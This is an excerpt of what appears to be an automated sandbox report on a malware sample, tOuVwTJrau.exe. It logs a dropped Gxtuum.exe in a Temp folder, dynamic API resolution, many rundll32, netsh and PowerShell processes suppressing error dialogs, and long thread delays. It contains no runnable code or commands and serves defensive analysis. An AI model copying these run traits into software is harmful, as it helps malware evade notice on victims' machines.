Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_003097DD GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_003097DD

Source: C:\Users\user\Desktop\tOuVwTJrau.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

